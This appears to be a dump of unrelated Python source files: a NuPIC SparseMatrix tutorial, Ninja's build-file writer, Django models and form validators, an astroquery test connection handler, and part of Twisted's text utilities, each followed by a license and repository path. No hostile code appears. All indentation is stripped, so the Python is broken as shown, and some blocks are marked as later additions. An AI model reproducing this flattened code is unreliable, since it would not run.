# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import cPickle
# SparseMatrix is a versatile class that offers a wide range of functionality.
# This tutorial will introduce you to the main features of SparseMatrix.
# SparseMatrix is located in nupic.bindings.math, and here is the import you need:
from nupic.bindings.math import *
# 1. Types of sparse matrices:
# ===========================
# There are two types of SparseMatrix, depending on the precision you need
# in your application: 32 and 64 bits. To create a SparseMatrix holding
# floating point values of the desired precision, simply specify it as the
# 'dtype' parameter in the constructor:
s = SparseMatrix(dtype='Float32')
# 2. Global Epsilon:
# =================
# By default, NuPIC is compiled to handle only 32 bits of precision at max,
# and sparse matrices consider a floating point value to be zero if it's less than
# 1e-6 (the best precision possible with 32 bits floats). This value of 1e-6 is
# called "epsilon", and it is a global value used throughout NuPIC to deal with
# near-zero floating point numbers.
# If this is not enough, NuPIC can be recompiled to access more precision.
# With NTA_DOUBLE_PRECISION or NTA_QUAD_PRECISION set at compile time, NuPIC can
# use 64 bits to represent floating point values. The global epsilon can
# then be set to smaller values via the variable nupic::Epsilon in nupic/math/math.hpp
print '\nGlobal epsilon :', getGlobalEpsilon()
# 3. Creation of sparse matrices:
# ==============================
# There are several convenient ways to create sparse matrices.
# You can create a SparseMatrix by passing it a 2D array:
s = SparseMatrix([[1,2],[3,4]], dtype='Float32')
print '\nFrom array 32\n', s
# ... or by passing it a numpy.array:
s = SparseMatrix(numpy.array([[1,2],[3,4]]),dtype='Float32')
print '\nFrom numpy array 32\n', s
# ... or by using one of the shortcuts: SM32, SM64:
s = SM32([[1,2],[3,4]])
print '\nWith shortcut 32\n', s
# It is also possible to create an empty SparseMatrix, or a copy of another
# SparseMatrix, or a SparseMatrix from a string in CSR format:
s_empty = SM32()
print '\nEmpty sparse matrix\n', s_empty
s_string = SM32('sm_csr_1.5 26 2 2 4 2 0 1 1 2 2 0 3 1 4')
print '\nSparse matrix from string\n', s_string
# A sparse matrix can be converted to a dense one via toDense:
a = numpy.array(s_string.toDense())
print '\ntoDense\n', a
# To set a sparse matrix from a dense one, one can use fromDense:
s = SM32()
s.fromDense(numpy.random.random((4,4)))
print '\nfromDense\n', s
# A sparse matrix can be pickled:
cPickle.dump(s, open('sm.txt', 'wb'))
s2 = cPickle.load(open('sm.txt', 'rb'))
print '\nPickling\n', s2
# 4. Simple queries:
# =================
# You can print a SparseMatrix, and query it for its number of rows, columns,
# non-zeros per row or column... There are many query methods available.
# All row operations are mirrored by the equivalent column operations
# Most operations are available either for a given row, or a given col, or
# all rows or all cols simultaneously. All col operations can be pretty efficient,
# even if the internal storage is CSR.
s = SM32(numpy.random.random((4,4)))
s.threshold(.5)
print '\nPrint\n', s
print '\nNumber of rows ', s.nRows()
print 'Number of columns ', s.nCols()
print 'Is matrix zero? ', s.isZero()
print 'Total number of non zeros ', s.nNonZeros()
print 'Sum of all values ', s.sum()
print 'Prod of non-zeros ', s.prod()
print 'Maximum value and its location ', s.max()
print 'Minimum value and its location ', s.min()
print 'Number of non-zeros on row 0 ', s.nNonZerosOnRow(0)
print 'If first row zero? ', s.isRowZero(0)
print 'Number of non-zeros on each row ', s.nNonZerosPerRow()
print 'Minimum on row 0 ', s.rowMin(0)
print 'Minimum values and locations for all rows', s.rowMin()
print 'Maximum on row 0 ', s.rowMax(0)
print 'Maximum values and locations for all rows', s.rowMax()
print 'Sum of values on row 0 ', s.rowSum(0)
print 'Sum of each row ', s.rowSums()
print 'Product of non-zeros on row 1', s.rowProd(1)
print 'Product of each row ', s.rowProds()
print 'Number of non-zeros on col 0 ', s.nNonZerosOnCol(0)
print 'If first col zero? ', s.isColZero(0)
print 'Number of non-zeros on each col ', s.nNonZerosPerCol()
print 'Minimum on col 0 ', s.colMin(0)
print 'Minimum values and locations for all cols', s.colMin()
print 'Maximum on col 0 ', s.colMax(0)
print 'Maximum values and locations for all cols', s.colMax()
print 'Sum of values on col 0 ', s.colSum(0)
print 'Sum of each col ', s.colSums()
print 'Product of non-zeros on col 1', s.colProd(1)
print 'Product of each col ', s.colProds()
# 5. Element access and slicing:
# =============================
# It is very easy to access individual elements:
print '\n', s
print '\ns[0,0] = ', s[0,0], 's[1,1] = ', s[1,1]
s[0,0] = 3.5
print 'Set [0,0] to 3.5 ', s[0,0]
# There are powerful slicing operations:
print '\ngetOuter\n', s.getOuter([0,2],[0,2])
s.setOuter([0,2],[0,2],[[1,2],[3,4]])
print '\nsetOuter\n', s
s.setElements([0,1,2],[0,1,2],[1,1,1])
print '\nsetElements\n', s
print '\ngetElements\n', s.getElements([0,1,2],[0,1,2])
s2 = s.getSlice(0,2,0,3)
print '\ngetSlice\n', s2
s.setSlice(1,1, s2)
print '\nsetSlice\n', s
# A whole row or col can be set to zero with one call:
s.setRowToZero(1)
print '\nsetRowToZero\n', s
s.setColToZero(1)
print '\nsetColToZero\n', s
# Individual rows and cols can be retrieved as sparse or dense vectors:
print '\nrowNonZeros ', s.rowNonZeros(0)
print 'colNonZeros ', s.colNonZeros(0)
print 'getRow ', s.getRow(0)
print 'getCol ', s.getCol(0)
# 6. Dynamic features:
# ===================
# SparseMatrix is very dynamic. Rows and columns can be added and deleted.
# A sparse matrix can also be resized and reshaped.
print '\n', s
s.reshape(2,8)
print '\nreshape 2 8\n', s
s.reshape(8,2)
print '\nreshape 8 2\n', s
s.reshape(1,16)
print '\nreshape 1 16\n', s
s.reshape(4,4)
print '\nreshape 4 4\n', s
s.resize(5,5)
print '\nresize 5 5\n', s
s.resize(3,3)
print '\nresize 3 3\n', s
s.resize(4,4)
print '\nresize 4 4\n', s
s.deleteRows([3])
print '\ndelete row 3\n', s
s.deleteCols([1])
print '\ndelete col 1\n', s
s.addRow([1,2,3])
print '\nadd row 1 2 3\n', s
s.addCol([1,2,3,4])
print '\nadd col 1 2 3 4\n', s
s.deleteRows([0,3])
print '\ndelete rows 0 and 3\n', s
s.deleteCols([1,2])
print '\ndelete cols 1 and 2\n', s
# It is also possible to threshold a row, column or whole sparse matrix.
# This operation usually introduces zeros.
s.normalize()
print '\n', s
s.thresholdRow(0, .1)
print '\nthreshold row 0 .1\n', s
s.thresholdCol(1, .1)
print '\nthreshold col 1 .1\n', s
s.threshold(.1)
print '\nthreshold .1\n', s
# 7. Element wise operations:
# ==========================
# Element wise operations are prefixed with 'element'. There are row-oriented
# column-oriented and whole matrix element-wise operations.
s = SM32(numpy.random.random((4,4)))
print '\n', s
s.elementNZInverse()
print '\nelementNZInverse\n', s
s.elementNZLog()
print '\nelementNZLog\n', s
s = abs(s)
print '\nabs\n', s
s.elementSqrt()
print '\nelementSqrt\n', s
s.add(4)
print '\nadd 4\n', s
s.normalizeRow(1, 10)
print '\nnormalizeRow 1 10\n', s
print 'sum row 1 = ', s.rowSum(1)
s.normalizeCol(0, 3)
print '\nnormalizeCol 0 3\n', s
print 'sum col 0 = ', s.colSum(0)
s.normalize(5)
print '\nnormalize to 5\n', s
print 'sum = ', s.sum()
s.normalize()
print '\nnormalize\n', s
print 'sum = ', s.sum()
s.transpose()
print '\ntranspose\n', s
s2 = SM32(numpy.random.random((3,4)))
print '\n', s2
s2.transpose()
print '\ntranspose rectangular\n', s2
s2.transpose()
print '\ntranspose rectangular again\n', s2
# 8. Matrix vector and matrix matrix operations:
# =============================================
# SparseMatrix provides matrix vector multiplication on the right and left,
# as well as specialized operations between a vector and the rows
# of the SparseMatrix.
x = numpy.array([1,2,3,4])
print '\nx = ', x
print 'Product on the right:\n', s.rightVecProd(x)
print 'Product on the left:\n', s.leftVecProd(x)
print 'Product of x elements corresponding to nz on each row:\n', s.rightVecProdAtNZ(x)
print 'Product of x elements and nz:\n', s.rowVecProd(x)
print 'Max of x elements corresponding to nz:\n', s.vecMaxAtNZ(x)
print 'Max of products of x elements and nz:\n', s.vecMaxProd(x)
print 'Max of elements of x corresponding to nz:\n', s.vecMaxAtNZ(x)
# axby computes linear combinations of rows and vectors
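# (the two call forms used below are assumed to behave as: axby(i, a, b, x)
# sets row i to a*row_i + b*x, while axby(a, b, x) applies that combination
# to every row)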
s.axby(0, 1.5, 1.5, x)
print '\naxby 0 1.5 1.5\n', s
s.axby(1.5, 1.5, x)
print '\naxby 1.5 1.5\n', s
# The multiplication operator can be used both for inner and outer product,
# depending on the shape of its operands, when using SparseMatrix instances:
s_row = SM32([[1,2,3,4]])
s_col = SM32([[1],[2],[3],[4]])
print '\nInner product: ', s_row * s_col
print '\nOuter product:\n', s_col * s_row
# SparseMatrix supports matrix matrix multiplication:
s1 = SM32(numpy.random.random((4,4)))
s2 = SM32(numpy.random.random((4,4)))
print '\nmatrix matrix multiplication\n', s1 * s2
# The block matrix vector multiplication treats the matrix as if it were
# a collection of narrower matrices. The following multiplies a1 by x and then a2 by x,
# where a1 is the sub-matrix of size (4,2) obtained by considering
# only the first two columns of a, and a2 the sub-matrix obtained by considering only
# the last two columns of a.
a = SM32([[1,2,3,4],[5,6,7,8],[9,10,11,12],[13,14,15,16]])
x = [1,2,3,4]
print a.blockRightVecProd(2, x)
# To do an element multiplication of two matrices, do:
print a
b = SM32(numpy.random.randint(0,2,(4,4)))
print b
a.elementNZMultiply(b)
print a
# In general, the "element..." operations implement element by element operations.
# 9. Arithmetic operators:
# =======================
# It is possible to use all 4 arithmetic operators, with scalars or matrices:
print '\ns + 3\n', s + 3
print '\n3 + s\n', 3 + s
print '\ns - 1\n', s - 1
print '\n1 - s\n', 1 - s
print '\ns + s\n', s + s
print '\ns * 3\n', s * 3
print '\n3 * s\n', 3 * s
print '\ns * s\n', s * s
print '\ns / 3.1\n', s / 3.1
# ... and to write arbitrarily linear combinations of sparse matrices:
print '\ns1 + 2 * s - s2 / 3.1\n', s1 + 2 * s - s2 / 3.1
# In place operators are supported:
s += 3.5
print '\n+= 3.5\n', s
s -= 3.2
print '\n-= 3.2\n', s
s *= 3.1
print '\n*= 3.1\n', s
s /= -1.5
print '\n/= -1.5\n', s
# 10. Count/find:
# ==============
# Use countWhereEqual and whereEqual to count or find the elements that have
# a specific value. The first four parameters define a box in which to look:
# [begin_row, end_row) X [begin_col, end_col). The indices returned by whereEqual
# are relative to the original matrix. countWhereEqual is faster than using len()
# on the list returned by whereEqual.
s = SM32(numpy.random.randint(0,3,(5,5)))
print '\nThe matrix is now:\n', s
print '\nNumber of elements equal to 0=', s.countWhereEqual(0,5,0,5,0)
print 'Number of elements equal to 1=', s.countWhereEqual(0,5,0,5,1)
print 'Number of elements equal to 2=', s.countWhereEqual(0,5,0,5,2)
print '\nIndices of the elements == 0:', s.whereEqual(0,5,0,5,0)
print '\nIndices of the elements == 1:', s.whereEqual(0,5,0,5,1)
print '\nIndices of the elements == 2:', s.whereEqual(0,5,0,5,2)
# ... and there is even more:
print '\nAll ' + str(len(dir(s))) + ' methods:\n', dir(s)
|
agpl-3.0
|
lushfuture/Phys-Comp
|
five-test/node_modules/johnny-five/junk/firmata-latest/node_modules/serialport/node_modules/node-gyp/legacy/tools/gyp/pylib/gyp/ninja_syntax.py
|
35
|
4968
|
# This file comes from
# https://github.com/martine/ninja/blob/master/misc/ninja_syntax.py
# Do not edit! Edit the upstream one instead.
"""Python module for generating .ninja files.
Note that this is emphatically not a required piece of Ninja; it's
just a helpful utility for build-file-generation systems that already
use Python.
"""
import textwrap
import re
def escape_spaces(word):
return word.replace('$ ','$$ ').replace(' ','$ ')
class Writer(object):
def __init__(self, output, width=78):
self.output = output
self.width = width
def newline(self):
self.output.write('\n')
def comment(self, text):
for line in textwrap.wrap(text, self.width - 2):
self.output.write('# ' + line + '\n')
def variable(self, key, value, indent=0):
if value is None:
return
if isinstance(value, list):
value = ' '.join(filter(None, value)) # Filter out empty strings.
self._line('%s = %s' % (key, value), indent)
def rule(self, name, command, description=None, depfile=None,
generator=False, restat=False, deplist=None):
self._line('rule %s' % name)
self.variable('command', command, indent=1)
if description:
self.variable('description', description, indent=1)
if depfile:
self.variable('depfile', depfile, indent=1)
if deplist:
self.variable('deplist', deplist, indent=1)
if generator:
self.variable('generator', '1', indent=1)
if restat:
self.variable('restat', '1', indent=1)
def build(self, outputs, rule, inputs=None, implicit=None, order_only=None,
variables=None):
outputs = self._as_list(outputs)
all_inputs = self._as_list(inputs)[:]
out_outputs = map(escape_spaces, outputs)
all_inputs = map(escape_spaces, all_inputs)
if implicit:
implicit = map(escape_spaces, self._as_list(implicit))
all_inputs.append('|')
all_inputs.extend(implicit)
if order_only:
order_only = map(escape_spaces, self._as_list(order_only))
all_inputs.append('||')
all_inputs.extend(order_only)
self._line('build %s: %s %s' % (' '.join(out_outputs),
rule,
' '.join(all_inputs)))
if variables:
for key, val in variables:
self.variable(key, val, indent=1)
return outputs
def include(self, path):
self._line('include %s' % path)
def subninja(self, path):
self._line('subninja %s' % path)
def default(self, paths):
self._line('default %s' % ' '.join(self._as_list(paths)))
def _count_dollars_before_index(self, s, i):
"""Returns the number of '$' characters right in front of s[i]."""
dollar_count = 0
dollar_index = i - 1
while dollar_index > 0 and s[dollar_index] == '$':
dollar_count += 1
dollar_index -= 1
return dollar_count
def _line(self, text, indent=0):
"""Write 'text' word-wrapped at self.width characters."""
leading_space = ' ' * indent
while len(text) > self.width:
# The text is too wide; wrap if possible.
# Find the rightmost space that would obey our width constraint and
# that's not an escaped space.
available_space = self.width - len(leading_space) - len(' $')
space = available_space
while True:
space = text.rfind(' ', 0, space)
if space < 0 or \
self._count_dollars_before_index(text, space) % 2 == 0:
break
if space < 0:
# No such space; just use the first unescaped space we can find.
space = available_space - 1
while True:
space = text.find(' ', space + 1)
if space < 0 or \
self._count_dollars_before_index(text, space) % 2 == 0:
break
if space < 0:
# Give up on breaking.
break
self.output.write(leading_space + text[0:space] + ' $\n')
text = text[space+1:]
# Subsequent lines are continuations, so indent them.
leading_space = ' ' * (indent+2)
self.output.write(leading_space + text + '\n')
def _as_list(self, input):
if input is None:
return []
if isinstance(input, list):
return input
return [input]
def escape(string):
"""Escape a string such that it can be embedded into a Ninja file without
further interpretation."""
assert '\n' not in string, 'Ninja syntax does not allow newlines'
# We only have one special metacharacter: '$'.
return string.replace('$', '$$')
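# A minimal usage sketch (added for illustration; not part of the upstream
# file). The rule and target names here are hypothetical.
if __name__ == '__main__':
import sys
w = Writer(sys.stdout)
w.comment('toy build file generated with ninja_syntax')
w.rule('cc', command='gcc -c $in -o $out', description='CC $out')
w.build('foo.o', 'cc', inputs='foo.c')
w.default('foo.o')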
|
mit
|
nino-c/plerp.org
|
src/profiles/migrations/0001_initial.py
|
64
|
1048
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('user', models.OneToOneField(serialize=False, primary_key=True, to=settings.AUTH_USER_MODEL)),
('slug', models.UUIDField(default=uuid.uuid4, blank=True, editable=False)),
('picture', models.ImageField(verbose_name='Profile picture', upload_to='profile_pics/%Y-%m-%d/', blank=True, null=True)),
('bio', models.CharField(verbose_name='Short Bio', max_length=200, blank=True, null=True)),
('email_verified', models.BooleanField(default=False, verbose_name='Email verified')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
|
mit
|
Yuecai/com-yuecai-dream
|
src/nodelay/forms.py
|
1
|
9690
|
# coding=utf-8
#########################################################################
# File Name: forms.py
# Original Author: 段凯强
# Mail: duankq@ios.ac.cn
# Created Time: 2013-12-26
# Update:
#########################################################################
#########################################################################
# Copyright (c) 2013~2014 by 段凯强
# Read the file "license" distributed with these sources, or XXXX
# XXXXXXXXXXXXXXXXXX switch for additional information, such as how
# to use, copy, modify, sell and/or distribute this software and its
# documentation for any purpose.
#########################################################################
import datetime, time
import re
from django import forms
class BasicTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
title = forms.CharField()
content = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Basic':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_title(self):
pattern = re.compile(u'^[a-zA-Z0-9\u4e00-\u9fa5]+$')
title = self.cleaned_data['title']
l = len(title)
if l >= 1 and l <= 10 and pattern.match(title):
return title
raise forms.ValidationError('title_err')
def clean_content(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
content = self.cleaned_data['content']
l = len(content)
if l >= 1 and l <= 100 and pattern.match(content) and not pattern_blank.match(content):
return content
raise forms.ValidationError('content_err')
class BookTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
bookName = forms.CharField()
readFrom = forms.CharField()
readTo = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Book':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_bookName(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
bookName = self.cleaned_data['bookName']
l = len(bookName)
if l >= 1 and l <= 50 and pattern.match(bookName) and not pattern_blank.match(bookName):
return bookName
raise forms.ValidationError('bookName_err')
def clean_readFrom(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
readFrom = self.cleaned_data['readFrom']
l = len(readFrom)
if l >= 1 and l <= 50 and pattern.match(readFrom) and not pattern_blank.match(readFrom):
return readFrom
raise forms.ValidationError('readFrom_err')
def clean_readTo(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
readTo = self.cleaned_data['readTo']
l = len(readTo)
if l >= 1 and l <= 50 and pattern.match(readTo) and not pattern_blank.match(readTo):
return readTo
raise forms.ValidationError('readTo_err')
class WorkTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
summary = forms.CharField()
goal = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Work':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_summary(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
summary = self.cleaned_data['summary']
l = len(summary)
if l >= 1 and l <= 50 and pattern.match(summary) and not pattern_blank.match(summary):
return summary
raise forms.ValidationError('summary_err')
def clean_goal(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
goal = self.cleaned_data['goal']
l = len(goal)
if l >= 1 and l <= 50 and pattern.match(goal) and not pattern_blank.match(goal):
return goal
raise forms.ValidationError('goal_err')
class HomeworkTaskForm(forms.Form):
taskType = forms.CharField()
date = forms.DateField()
time = forms.IntegerField()
courseName = forms.CharField()
introduction = forms.CharField()
def clean_taskType(self):
taskType = self.cleaned_data['taskType']
if taskType == u'Homework':
return taskType
raise forms.ValidationError('taskType_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
def clean_courseName(self):
pattern = re.compile(u'^[a-zA-Z0-9\u4e00-\u9fa5]+$')
courseName = self.cleaned_data['courseName']
l = len(courseName)
if l >= 1 and l <= 10 and pattern.match(courseName):
return courseName
raise forms.ValidationError('courseName_err')
def clean_introduction(self):
pattern = re.compile(u'^[()!¥?。,《》{}【】“”·、:;‘’……\s\x21-\x7e\u4e00-\u9fa5]+$')
pattern_blank = re.compile(u'^\s+$')
introduction = self.cleaned_data['introduction']
l = len(introduction)
if l >= 1 and l <= 100 and pattern.match(introduction) and not pattern_blank.match(introduction):
return introduction
raise forms.ValidationError('introduction_err')
class TaskIdForm(forms.Form):
taskId = forms.IntegerField()
def clean_taskId(self):
taskId = self.cleaned_data['taskId']
if taskId > 0:
return taskId
raise forms.ValidationError('taskId_err')
class ChangeDateForm(forms.Form):
taskId = forms.IntegerField()
date = forms.DateField()
time = forms.IntegerField()
def clean_taskId(self):
taskId = self.cleaned_data['taskId']
if taskId > 0:
return taskId
raise forms.ValidationError('taskId_err')
def clean_date(self):
date = self.cleaned_data['date']
today = datetime.date.today()
if date < today + datetime.timedelta(days = 8) and date > today:
return date
raise forms.ValidationError('date_err')
def clean_time(self):
time = self.cleaned_data['time']
if time >= 1 and time <= 3:
return time
raise forms.ValidationError('time_err')
class ExchangeTaskForm(forms.Form):
taskId1 = forms.IntegerField()
taskId2 = forms.IntegerField()
def clean_taskId1(self):
taskId1 = self.cleaned_data['taskId1']
if taskId1 > 0:
return taskId1
raise forms.ValidationError('taskId1_err')
def clean_taskId2(self):
taskId2 = self.cleaned_data['taskId2']
if taskId2 > 0:
return taskId2
raise forms.ValidationError('taskId2_err')
class DelayShiftTaskForm(forms.Form):
fromId = forms.IntegerField()
toId = forms.IntegerField()
def clean_fromId(self):
fromId = self.cleaned_data['fromId']
if fromId > 0:
return fromId
raise forms.ValidationError('fromId_err')
def clean_toId(self):
toId = self.cleaned_data['toId']
if toId > 0:
return toId
raise forms.ValidationError('toId_err')
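# A minimal usage sketch (added for illustration; assumes a configured
# Django environment). The field values below are hypothetical.
if __name__ == '__main__':
tomorrow = datetime.date.today() + datetime.timedelta(days = 1)
form = BasicTaskForm({u'taskType': u'Basic', u'date': tomorrow,
u'time': 2, u'title': u'demo', u'content': u'hello'})
print form.is_valid() # -> True for in-range values like these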
|
bsd-3-clause
|
imbasimba/astroquery
|
astroquery/utils/tap/conn/tests/DummyConnHandler.py
|
2
|
5631
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
=============
TAP plus
=============
@author: Juan Carlos Segovia
@contact: juan.carlos.segovia@sciops.esa.int
European Space Astronomy Centre (ESAC)
European Space Agency (ESA)
Created on 30 jun. 2016
"""
from astroquery.utils.tap import taputils
from six.moves.urllib.parse import urlencode
import requests
class DummyConnHandler:
def __init__(self):
self.request = None
self.data = None
self.fileExt = ".ext"
self.defaultResponse = None
self.responses = {}
self.errorFileOutput = None
self.errorReceivedResponse = None
self.contentType = None
self.verbose = None
self.query = None
self.fileOutput = None
def set_default_response(self, defaultResponse):
self.defaultResponse = defaultResponse
def get_default_response(self):
return self.defaultResponse
def get_last_request(self):
return self.request
def get_last_data(self):
return self.data
def get_last_query(self):
return self.query
def get_error_file_output(self):
return self.errorFileOutput
def get_error_received_response(self):
return self.errorReceivedResponse
def set_response(self, request, response):
self.responses[str(request)] = response
def execute_tapget(self, request=None, verbose=False):
return self.__execute_get(request, verbose)
def execute_dataget(self, query, verbose=False):
return self.__execute_get(query, verbose)
def execute_datalinkget(self, subcontext, query, verbose=False):
self.query = query
return self.__execute_get(subcontext, verbose)
def __execute_get(self, request, verbose):
self.request = request
self.verbose = verbose
return self.__get_response(request)
def execute_tappost(self, subcontext=None, data=None,
content_type=None, verbose=False):
return self.__execute_post(subcontext, data, content_type, verbose)
def execute_datapost(self, data=None, content_type=None, verbose=False):
return self.__execute_post("", data, content_type, verbose)
def execute_datalinkpost(self, subcontext=None, data=None,
content_type=None, verbose=False):
return self.__execute_post(subcontext, data, content_type, verbose)
def __execute_post(self, subcontext=None, data=None,
content_type=None, verbose=False):
self.data = data
self.contentType = content_type
self.verbose = verbose
sortedKey = self.__create_sorted_dict_key(data)
if subcontext.find('?') == -1:
self.request = f"{subcontext}?{sortedKey}"
else:
if subcontext.endswith('?'):
self.request = f"{subcontext}{sortedKey}"
else:
self.request = f"{subcontext}&{sortedKey}"
return self.__get_response(self.request)
def dump_to_file(self, fileOutput, response):
self.errorFileOutput = fileOutput
self.errorReceivedResponse = response
print(f"DummyConnHandler - dump to file: file: '{fileOutput}', \
response status: {response.status}, response msg: {response.reason}")
def __get_response(self, responseid):
try:
return self.responses[str(responseid)]
except KeyError as e:
if self.defaultResponse is not None:
return self.defaultResponse
else:
print(f"\nNot found response for key\n\t'{responseid}'")
print("Available keys: ")
if self.responses is None:
print("\tNone available")
else:
for k in self.responses.keys():
print(f"\t'{k}'")
raise (e)
def __create_sorted_dict_key(self, data):
dictTmp = {}
items = data.split('&')
for i in (items):
subItems = i.split('=')
dictTmp[subItems[0]] = subItems[1]
# sort dict
return taputils.taputil_create_sorted_dict_key(dictTmp)
def check_launch_response_status(self, response, debug,
expected_response_status,
raise_exception=True):
isError = False
if response.status != expected_response_status:
if debug:
print(f"ERROR: {response.status}: {response.reason}")
isError = True
if isError and raise_exception:
errMsg = taputils.get_http_response_error(response)
print(response.status, errMsg)
raise requests.exceptions.HTTPError(errMsg)
else:
return isError
def url_encode(self, data):
return urlencode(data)
def get_suitable_extension(self, headers):
return self.fileExt
def set_suitable_extension(self, ext):
self.fileExt = ext
def get_suitable_extension_by_format(self, output_format):
return self.fileExt
def get_file_from_header(self, headers):
return self.fileOutput
def find_header(self, headers, key):
return taputils.taputil_find_header(headers, key)
def execute_table_edit(self, data,
content_type="application/x-www-form-urlencoded",
verbose=False):
return self.__execute_post(subcontext="tableEdit", data=data,
content_type=content_type, verbose=verbose)
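# A minimal usage sketch (added for illustration; not part of the upstream
# tests): register a canned response, then replay it through a GET.
if __name__ == '__main__':
class _FakeResponse: # hypothetical stand-in for an HTTP response object
status, reason = 200, 'OK'
handler = DummyConnHandler()
handler.set_response('sync?QUERY=1', _FakeResponse())
print(handler.execute_tapget('sync?QUERY=1').status) # -> 200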
|
bsd-3-clause
|
candy7393/VTK
|
ThirdParty/Twisted/twisted/python/text.py
|
40
|
5475
|
# -*- test-case-name: twisted.test.test_text -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Miscellany of text-munging functions.
"""
def stringyString(object, indentation=''):
"""
Expansive string formatting for sequence types.
C{list.__str__} and C{dict.__str__} use C{repr()} to display their
elements. This function also turns these sequence types
into strings, but uses C{str()} on their elements instead.
Sequence elements are also displayed on separate lines, and nested
sequences have nested indentation.
"""
braces = ''
sl = []
if type(object) is dict:
braces = '{}'
for key, value in object.items():
value = stringyString(value, indentation + ' ')
if isMultiline(value):
if endsInNewline(value):
value = value[:-len('\n')]
sl.append("%s %s:\n%s" % (indentation, key, value))
else:
# Oops. Will have to move that indentation.
sl.append("%s %s: %s" % (indentation, key,
value[len(indentation) + 3:]))
elif type(object) is tuple or type(object) is list:
if type(object) is tuple:
braces = '()'
else:
braces = '[]'
for element in object:
element = stringyString(element, indentation + ' ')
sl.append(element.rstrip() + ',')
else:
sl[:] = map(lambda s, i=indentation: i + s,
str(object).split('\n'))
if not sl:
sl.append(indentation)
if braces:
sl[0] = indentation + braces[0] + sl[0][len(indentation) + 1:]
sl[-1] = sl[-1] + braces[-1]
s = "\n".join(sl)
if isMultiline(s) and not endsInNewline(s):
s = s + '\n'
return s
def isMultiline(s):
"""
Returns C{True} if this string has a newline in it.
"""
return (s.find('\n') != -1)
def endsInNewline(s):
"""
Returns C{True} if this string ends in a newline.
"""
return (s[-len('\n'):] == '\n')
def greedyWrap(inString, width=80):
"""
Given a string and a column width, return a list of lines.
Caveat: I use a stupid greedy word-wrapping
algorithm. I won't put two spaces at the end
of a sentence. I don't do full justification.
And no, I've never even *heard* of hyphenation.
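A short illustrative example:
>>> greedyWrap('each of us walks a wide and quiet shore', 15)
['each of us', 'walks a wide', 'and quiet shore']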
"""
outLines = []
#eww, evil hacks to allow paragraphs delimited by two \ns :(
if inString.find('\n\n') >= 0:
paragraphs = inString.split('\n\n')
for para in paragraphs:
outLines.extend(greedyWrap(para, width) + [''])
return outLines
inWords = inString.split()
column = 0
ptr_line = 0
while inWords:
column = column + len(inWords[ptr_line])
ptr_line = ptr_line + 1
if (column > width):
if ptr_line == 1:
# This single word is too long, it will be the whole line.
pass
else:
# We've gone too far, stop the line one word back.
ptr_line = ptr_line - 1
(l, inWords) = (inWords[0:ptr_line], inWords[ptr_line:])
outLines.append(' '.join(l))
ptr_line = 0
column = 0
elif not (len(inWords) > ptr_line):
# Clean up the last bit.
outLines.append(' '.join(inWords))
del inWords[:]
else:
# Space
column = column + 1
# next word
return outLines
wordWrap = greedyWrap
def removeLeadingBlanks(lines):
ret = []
for line in lines:
if ret or line.strip():
ret.append(line)
return ret
def removeLeadingTrailingBlanks(s):
lines = removeLeadingBlanks(s.split('\n'))
lines.reverse()
